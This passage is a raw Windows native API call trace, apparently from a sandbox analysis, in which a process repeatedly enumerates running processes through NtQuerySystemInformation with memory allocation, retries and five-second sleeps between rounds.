ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.931] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.931] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.938] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.943] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.948] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.950] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.951] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.958] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.959] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.960] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.961] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.961] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.967] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.970] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.970] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.971] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.979] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.987] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.988] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.990] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.997] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.998] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.999] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.006] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.008] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.009] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.014] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.015] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.018] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.024] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.025] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.029] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.034] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.035] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.038] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.039] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.039] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.044] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.047] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.052] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.054] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.055] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.057] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.065] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.067] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.068] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.069] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.075] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.077] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.078] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.083] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.084] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.086] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.087] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.087] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.093] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.096] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.096] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.101] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.102] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.104] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.106] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.106] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.111] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.112] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.113] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.113] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.120] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.121] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.123] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.124] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, 